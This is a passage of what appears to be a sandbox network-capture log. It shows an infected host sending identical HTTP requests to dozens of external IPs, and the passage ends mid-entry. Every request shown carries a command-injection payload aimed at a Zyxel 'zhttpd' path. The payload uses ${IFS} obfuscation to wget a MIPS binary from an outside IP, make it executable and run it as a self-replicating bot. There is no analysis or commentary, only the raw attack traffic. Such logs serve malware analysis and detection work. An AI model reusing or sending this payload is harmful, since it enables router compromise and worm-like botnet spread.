                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4777192.168.2.145606890.49.136.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965152979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4778192.168.2.1453126123.93.255.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965188980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4779192.168.2.143988065.156.37.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965224981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4780192.168.2.145075077.191.33.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965281010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4781192.168.2.143942898.20.68.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965337038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4782192.168.2.1457922148.211.143.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965383053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4783192.168.2.1432956218.1.160.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965418100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4784192.168.2.1451488219.105.133.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965464115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4785192.168.2.145164236.147.133.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965528965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4786192.168.2.1437256114.69.112.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965559959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4787192.168.2.144041084.31.171.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965578079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4788192.168.2.145694425.18.16.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965640068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4789192.168.2.1439924216.112.165.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965672970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4790192.168.2.143598247.106.85.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965719938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4791192.168.2.1460752191.145.67.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965764046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4792192.168.2.1446638157.195.255.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965795040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4793192.168.2.143959099.102.143.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965845108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4794192.168.2.1460108144.157.23.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965894938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4795192.168.2.1442702158.129.172.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965945959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4796192.168.2.14580408.40.165.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965981960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4797192.168.2.144974850.17.207.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966027975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4798192.168.2.1442620198.217.26.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966089964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4799192.168.2.1435964121.254.120.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966125965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4800192.168.2.1433662198.97.194.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966173887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4801192.168.2.143657624.208.209.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966213942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4802192.168.2.1438958198.9.171.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966242075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4803192.168.2.143909872.157.197.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966291904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4804192.168.2.1450312179.241.102.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966341019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4805192.168.2.1452282188.47.147.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966388941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4806192.168.2.144499252.140.126.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966420889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4807192.168.2.144771879.162.238.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966475964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4808192.168.2.1446660142.161.171.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966499090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4809192.168.2.1443898191.169.134.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966527939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4810192.168.2.144131291.98.204.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966562033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4811192.168.2.1458714130.82.7.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966604948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4812192.168.2.144270698.223.1.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966638088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4813192.168.2.1457612111.77.198.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966675997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4814192.168.2.144695244.19.64.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966727018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4815192.168.2.145598668.165.204.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966756105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4816192.168.2.143359683.83.105.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966787100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4817192.168.2.1440674113.219.195.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966814041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4818192.168.2.1447844220.16.31.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966846943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4819192.168.2.145919462.68.117.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966888905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4820192.168.2.145287092.138.141.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.966926098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4821192.168.2.144148446.90.46.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967003107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4822192.168.2.145042290.113.201.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967048883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4823192.168.2.145546060.136.188.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967075109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4824192.168.2.143471288.172.162.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967098951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4825192.168.2.1447588138.18.59.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967125893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4826192.168.2.145415477.186.93.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967195988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4827192.168.2.1441280158.217.221.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967238903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4828192.168.2.143497048.1.142.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967272997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4829192.168.2.1452354220.162.164.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967325926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4830192.168.2.144568224.154.178.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967355967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4831192.168.2.1458730175.109.220.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967389107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4832192.168.2.143953852.53.168.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967411041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4833192.168.2.1450536125.151.235.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967473984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4834192.168.2.143444492.68.5.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967519999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4835192.168.2.143766441.10.28.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967557907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4836192.168.2.145504654.14.135.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967607021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4837192.168.2.1433034117.3.161.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967637062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4838192.168.2.1445084180.29.40.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967698097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4839192.168.2.1439736188.103.157.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967735052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
